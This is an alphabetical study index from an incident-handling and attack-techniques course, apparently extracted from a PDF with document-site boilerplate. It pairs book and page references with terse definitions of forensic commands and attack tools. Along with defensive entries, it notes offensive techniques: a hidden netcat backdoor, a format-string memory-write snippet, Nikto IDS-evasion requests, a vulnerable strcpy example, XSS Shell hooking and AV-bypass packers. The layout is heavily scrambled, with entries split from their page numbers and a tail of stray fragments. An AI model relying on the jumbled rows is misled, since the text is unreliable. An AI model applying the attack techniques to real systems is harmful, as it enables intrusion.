space) 1 249 " -print
eg. copy netcat to tmp folder,run in background, use unlink /tmp/nc to
unusual files (unlinked) 1 262 unlink
For /R C:\ %i in (*) do @if %~zi gtr 10000000 echo %i %~zi. Files >
unusual files (windows) 1 72 10MB
promisc mode,mult failed logon,RPC with strange character sqn,apche
unusual log entries 1 256 errors
unusual network usuage 1 252 lsof -I, netstat -nap, arp -a
unusual scheduled tasks (cron scheduled by root=crontab -u root -l.system-wide=cat
1 253
jobs) /etc/crontab.Ls /etc/cron.*
service --status-all,chkconfig --list(shows sysVservices). systemctl list-
unusual services 1 248 unit-files(systemd services)
uptime (Linux cheatsheet) 1 257 tels system load (CPU particulary)
UPX 5 19 packing tool to make executable dificult to anlyze
User Mode Rootkit Defenses Pre:don’t let atk get root,patch.Ide:ls vs "echo *"use tools like chkrootkit,HIPs
User Mode Rootkit Defenses2 con:Analyze other changes made.Era:Re-image,patch,change pass.Rec:Monitor
1 209, 264 -d [Home_dir] [login] > Create non-root account
useradd
4 43
UserID (Netcat backdoor listener) the commands will be executed as the user that ran the Netcat listener
utmp (/var/run/utmp) 5 89-90 info about current logged users
3 140-142 create Macro to insert in malicious file
Veil (Veil-Evasion)
5 18 Anti-virus bypass tool
Veracode (binary-analysis) 3 127 no need for source code, checks compiled code for flaws
viewing output (less) 1 221 less /dev or ls /dev |less
VIEWSTATE 5 137, 141-142 HTML field used by VSAgent backdoor for C2 commands

Virtual Machine escape Breaking out of a VM and interacting with the Host Box
Virtual Network Computing Free cross-platform remote access suite.most AV don't catch cos also
5 9-14
(VNC) legit.
VirtualAllocEx 5 45 Allocate space in the victim process for DLL injection
Vmcat
IR's use vm to test and defend against attck.Malicous code can detect&destry VM's
VM detection
look for vme processes,memory,shifted interupt desc table,vme hdwr,proc intructns
VMcat not a true escape because it coordinates processes bw host & guest
VM Escape
Allow an attacker in a guest to execute code on the host; Vmcat
VM Escape Defenses patch.dont mix weak & strong systems/sensitive data with public,VM's are not FW's
vmlinuz 5 57 sored Kernel image, typically located in the /boot directory
VMware 3 77 MAC addresses beginning with 00.0c.29 are WMware
vmware machines (and 1 198 .vmx,nvram,.vmdk,.vmss,.vmsn
associated files)
vmware network options 1 202 host-only,bridged and Nat
Vmware networking watch-out 1 203 VMnet0- bridged; VMnet1- Host Only; VMnet8- NAT
vmware uses 1 197 IR,malware analysis,digital forensics,ethican and practice hacking
active:server listening on TCP 5900,listenin mode:server sends GUI via
VNC Active and Listening client 5 12 TCP 5500 to client
App mode(in tray),Service mode(in service list&tray after reboot),hide
VNC modes (WinVNC) 5 13 tray icon
VNC Platforms 5 11 Windows,Linux,Solaris,HP-UX 11,MAC OS X. Works across platforms

1 43, 110 capture and analyze memory dumps on Win
Volatility
5 22
Volatility DLL's and Command python2.7 vol.py dlllist -p [pid] -f [path to mem_capture] --profile=(OS)
Line
Volatility Invoke using python python2.7 vol.py -h.For help: python2.7 vol.py [module] -h
Volatility Modules Datetime,sockets,connections,timeliner,pslist,dlllist,files,procexedump,imageinfo..
Volatility Viewing Network python2.7 vol.py timeliner -f [path to mem_capture] --profile=[]| grep ESTABLISHED
Connections
Volatility Viewing Processes python2.7 vol.py timeliner -f [path to mem_capture] --profile=WIN7SP0x86(OS)
146, 148-151, beacons at 10 sec intervals.base64 encoded, sends over cleartext
1
VSAgent (backdoor) 154 HTML
5 137-140, 142
Pre:close unused ports, shut unused service,patch sys,RUN CRED
Vulnerability Scanner Defense 2 124 SCAN.Ide:IDS
can't checks vuln they don’t know,can't exploit or pivot,can't correlate
Vulnerability Scanner Limitations 2 118 multple vulns
18, 29, 53-58 war dialers dial a series of nrs, demon dialers brute force a single nr
war dialing and demon dialers 2 for passwds
Justify business need, coduct on org,check bills, evening office
moderm check
War Driving 2 18, 60-75
Iden:PBX Scaning,PBX IPS.Con:shutdown moderm.Erad:RM mod,chg nr
& passwd
war room 1 36 Secure room with copies of evidence,locking cabinet,no windows
Warhol 4 60-61 pre-scan internet,load worm into list, infect first vuln systems,spread
use of the sys may be monitored and recorded".legal team should

21 review&approve
Warning banners 1
5 points.Company use only,unath acces prohibited, penalties,sys
175 monitored, law enf
Warrant (Search/Seizure) if you receive one, contact legal dept to make sure the PPW is correct

WarVOX 2 54-55, 57 wardialing software, up to 8k calls/hr,caller ID spoofing

Web Application Attack Defenses 4 Pre:data integrity;hash,timestamp,Ecrypt info in cookie,SSL,16/more char Session ID
Web Application Attack Defenses Pre:use proxy to detect when inbound traffic is altered.Modsecurity,F5
4 150
2 ASM,citrix
Web Application Attack Defenses Ide:user complain.Con:shutdown app&fix/quarantine victim
4 151
3 acc.Era:remove data…
Web Application Attack and Web App Proxy - Python based, include MitM proxy for manipulating
4 146
Audit Framework (w3af) web apps (FREE)
Web Application Firewall (WAF) 4 101, 150
Web Application Manipulation 4 use proxy to maipulate data in transit,account nrs,balance,shopping cart prices etc
proxy
Web Attack Proxy tools 4 Fiddler,ZAP proxy,Burp Proxy,W3af,odysseus/Telemachus all manipulation proxy
Web based Recon/Attack Tools 2 50 Shodan,dnsstuff,traceroute.org,network-tools.com,securityspace.com
Web Proxy Auto-detect (WPAD) 3 79, 83-84

Web scanner defense Same as Vuln Scanner defense + chrooted environment(can only see part of file sys)
web spider(web crawker) 2 33 Access every page on a site in a short time (possible Google bot)
Webspy re-fetches webpages based on the sniffed URL.Similar tools: Driftnet & Niksun
WEPCrack 2 64 wireless sniffer or cracking WEP keys
wevtutil qe security /f:text > 1 74, 190-191 Security event logs (wevtutil) Win7
logs.txt
4 91
wget
5 94, 99
1 158
3 93,136,145,150
whitelisting
4 74, 87
5 132
whatis ifconfig, aprops network (=man -k netwok ie. lookup by
whatis and apropos 1 243 keywork)
208, 211-212,
1 218, 222, 229,
235, 239
whoami
3 33, 42
5 93, 98
6 56
18-22, 47-48, live with it/use firm's name as point of contact,you cant tell you've
2 53 been lookedup
Whois 18-22, 47-48, lookup target at internic to determine registrat, then go to registrar to
2 53 get more info
6 23, 25-27
62, 64-65, 72,
Wifi Protected Access (WPA) 2 74
win32k.sys 5 57
Windows Credential Editor (WCE) 4 51 Pass-the -Hash for Kerberos, LANMAN chal/resp, NTLMv1 & 2
Windows DNS server flaw when misconfigured accepts dns reponse with more info than asked.
2 137-138
Windows NT 4 16, 24-25, 32
5 104
WinNuke 4 154, 161

Wired Equivalent Privacy (WEP) 2 60, 62, 64-65

Wireless driving defense 1 2 72 Prep:good ssid name(serial nr of AP),WPA2 with AES never TKIP
Wireless driving defense 2 2 73 Preparation:disable Aggressive mode IKE
Wireless driving defense Wireless IDS(Aruba,Airmagnet,cisco&others can DOS rogue
2 74
3.Ide,con,era,re AP).Remove Rogue AP's
default ssid,broadcast beacon 10times/sec,cloaking sends ssid to client
Wireless Misconfiguration 2 60 in clear text
TCPdump; Wireshark; Omnipeek; Aircrack-ng sniffs 50-100MB of data
Wireless sniffing tools 2 64 to determine the WEP key,WEPcrack,ASLEAP
Wireless VPN crack 2 72 IKE crack and cain can break PSK with Ipsec in set to aggressive mode
1 43, 52
Wireshark - passive sniffer capture packets andcan process already captured files. Over 500
3 46, 131, 134
protocols
Witty 4 55, 57, 64
67, 70, 81-82,
1 126, 138, 188-
189, 192
wmic 2 102
4 177-178
26-27, 34-35,
5 110
Wmic /node:
1 126 look for unusual proc(works remotely)
[MachineName]/user[]/pass
wmic check usb and other 1 192 wmic diskdrive get interfacetype,mediatype,model
plugged interf
wmic get users loggedin 1 189 wmic computersystem get username
wmic get usrs loggedin all sys rmt 1 189 wmic /node:@systems.txt computersystem get username /format:csv
cmd
wmic on multiple systesms wmic /node:@systems.txt product get description,name .../format:csv > inv.txt
export to csv
wmic product get name,version pull list of installed software

1 67, 81-82
wmic process 26-27, 34-35,
5 110
wmic process [pid] delete 2 102 kill processes
wmic process get name, priority to see a list of process ptiorities in Win
wmic process where 4 178 kill multiple processes

name="notepad.exe" delete
wmic useraccount list brief look for acc's the attacker created.Or use the net user
1 126
(Recovery) cmds.Cat/etc/passwd in linux
WordWebBugs 1 107 stolen documents with call backs, good for tracking attacker
Worms and Bots 4 53-74
SQL Slammer, Blaster, Nachi/Welchia, Sobig.F etc ; Bagel, Netsky,
Worms and Bots History 4 55 MyDoom etc, Witty, Sasser ; Zotob and bot-bundeling ; Storm ;
Conficker ; Stuxnet ; Morto ; Flame ; Loky, Tiny Banker Trojan..
Worm Defense : Ethical Worms ? can be used to inoculate the internet with patches.But we can get sued
Worm examples & exploits(multi able to exploit multiple vulnerabilities; Nimba:IE,IIS,outlook 12

exploit) 4 57 exp.Ramen:3 expl.Conficker:buffer over.UsB&Smb spread

Worms - Flash "Hockey stick"pre-scan internet,load worm into list, infect first vuln
Technique/Warhole 4 60 systems,spread
exponential,spread shape of a gold stick,Warhol 99% in 15mins,Flash
Worms - Fast Spreading 4 60 30seconds
change appearance and function e.g a malware that does DOS,steals
Worms - Metamorphic Worms 4 65 CC's,user ID's
may exploit multiple OS types ; In 2010 Stuxnet:windows & SCADA
Worms - Multiplatform 4 58 sys.IIS/Sadmind worm:Windows and solaris
dynamically change appearance each time they run; keeps the same
Worms - Polymorphic Worms 4 62 function
Worms - Truly Nasty Payload 4 64 Breeders consuming resource.Steals info fro sys.distribute bots.
Worms intro and History 4 53/55 automated attack tools that spread via networks
Pre:Buffover defense,test&deploy patches,encrypt
Worm and Bot Defenses 4 74 hdd.Id:AV.Con:Remov from netw
wrap a backdoor around some other app.Aka Binders.wrap exes into
Wrappers 5 18 backdoor. SaranWrap
Write Blocker 1 111 work with the Forensic image copy in a read-only manner
Writing to memory locations endian(inputs backwards),2 hex=1ascii,0xbffffac0=\xc0\xfa\xff\xbf\%d%n
wtmp (/var/log/wtmp) 5 89-90 contains data about past user logins
X-Ways Forensics 1 41 Forensics tool (Commercial)
3 97, 124, 144 Editing assembly PUSH, POP, MOVE. XOR itself=0
XOR
4 63 XORing evil code with a key
pulls data from network.Can be live or reviewing a capture
Xplico 3 55 (offline).Stores components
fingerprinting tool,better results than nmap but smaller sig DB,uses
xProbe2 2 95 fuzzy logic
XSS Shell setup webserver with XSS Shell, plant hook on vuln site, victim browser compromised
Yoda & Themida 5 19 packing tool to make executable dificult to anlyze
104, 146-147 supports chained proxies,stores html locally,import SSL client cert,test
ZAP Proxy 4 SQLi&Xss
Zenmapp 2 80, 84 GUI for Nmap
Zero-day Exploit worms 4 59 eg. Stuxnet exploited 4 zero-days in windows target machines
zgrep 1 155-156 uncompress Bro files
Zone Transfer 2 24-27 attacker grab a dump of DNS server records.Uses TCP 53
Zone Transfer Unix dig @[DNS_server_IP][target_domain] -t AXER
Zone Transfer Windows nslookup,server[sever],set type=any,ls -d [domain]. tcpdump -nn port 53 and host

Index

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Index

Uploaded by

Copyright:

Available Formats

Tools and Commands Book/Page Definitions

Tools and Commands BookPage Definition

# //Secureworks/Confidential - Limited External Distribution Page 1

Active OS fingerprinting defences close ports,use tools:IP personality,portspoof,Osfuscate,blackhole,stealth patch,etc

# //Secureworks/Confidential - Limited External Distribution Page 2

Aruba Networks 2 75 Wireless IDS monitorint- Iden War driving

1st line of def against is to know the baseline of normal traceroute

Bind shell 3 115 Metasploit Payloads

# //Secureworks/Confidential - Limited External Distribution Page 3

morph code,run sys priv,list shell,add/rm file shares,autostart,vuln

Buffer Overflow Example in C 3 96 char bufferA[50];char buffer[16];gets(bufferA);strcpy(bufferB, bufferA)

# //Secureworks/Confidential - Limited External Distribution Page 4

Check sum hashed tools 2 13 md5sum&sha1sum(Unix),md5summer(Win); md5deep(Win&Unix)-all

# //Secureworks/Confidential - Limited External Distribution Page 5

patch sys&neighs,IPS,null route,passwd change,alter trustl,FW

# //Secureworks/Confidential - Limited External Distribution Page 6

Cross-site scripting - Log Server

Cross-site scripting Mechanisms 4 123 HTTP(s),Email,FTP,Swipe cards,postal card scanners,magnetic swipes

# //Secureworks/Confidential - Limited External Distribution Page 7

DNS Cache ipconfig /displaydns

DNS Cache Poisoning Defense 5 Ide:nslookup,dig,ping.Con:flushdns cache.Erad:upgrade,random src ports,split-split

# //Secureworks/Confidential - Limited External Distribution Page 8

Electronic Data Interchange (EDI) 4 123

# //Secureworks/Confidential - Limited External Distribution Page 9

Goal:get rid of artifacts,accs,code,software,etc.determine cause and

51, 53, 58-59, active

# //Secureworks/Confidential - Limited External Distribution Page 10

Temporarily deactivates AV, dumps passwd hash and reactivates AV;

Firefox webpage script editor and development tool for application

used to identify files hosted on sites.everything google search does

1 35, 37, 110, 113 DD,Memoryze(Mandiant) for analyzing memory on windows,volatility

# //Secureworks/Confidential - Limited External Distribution Page 11

GET /%63%67%69%2d%6 URL encoding - Way Nikto Avoids IDS

GET<tab>/CGI- Tab Separation - Way Nikto avoids IDS

35-36, 38-44 good for Recon; cache:www.counterhack.net. Www.archive.org for

# //Secureworks/Confidential - Limited External Distribution Page 12

HKEY Historical usb usage(when reg query

HKLM\System\CurrentControlSet 0/1 ; Null Sessions can/can't enumerate shares

# //Secureworks/Confidential - Limited External Distribution Page 13

gather intel on systems, visited sites, ftp, monitor msg boards,

# //Secureworks/Confidential - Limited External Distribution Page 14

Initial Sequence Number (ISN) 5 128-30

Erad:Remove infriging elements.Rec:Rebrand/rebuild.Lesson:samples,

# //Secureworks/Confidential - Limited External Distribution Page 15

IPv4 Header 2 MF,DF,IP ID,Fragment offset, type of service=06

hides processes,files,network usuage(tcp&udp),promisc

# //Secureworks/Confidential - Limited External Distribution Page 16

con:Analyze other changes made.Era:Re-image,patch,change

# //Secureworks/Confidential - Limited External Distribution Page 17

5 100 lsof -Pi | grep 8080

# //Secureworks/Confidential - Limited External Distribution Page 18

MD4 4 19 NT hash stored in SAM

Metasploit aditional Features multi session,in-mem process migration,disable

# //Secureworks/Confidential - Limited External Distribution Page 19

Msfvenom 4 77 converts a payload into a stand alone file

11-26, 28-43 reads and writes data acrros network.

# //Secureworks/Confidential - Limited External Distribution Page 20

"-l=listen,L=listen harder,-u:UDP,-p=src port,-e=exe,-z:zero I/O,-

55-56, 66, 81,

# //Secureworks/Confidential - Limited External Distribution Page 21

network usage (linux) 1 228 netstat -nap,netstat -nap | less

2 80,82-84,93-96, (nmap -A)all details, pulls banners, OS iden, traceroute,etc ; 106

3 20 on Linux/Unix makes a process keep running even if the user who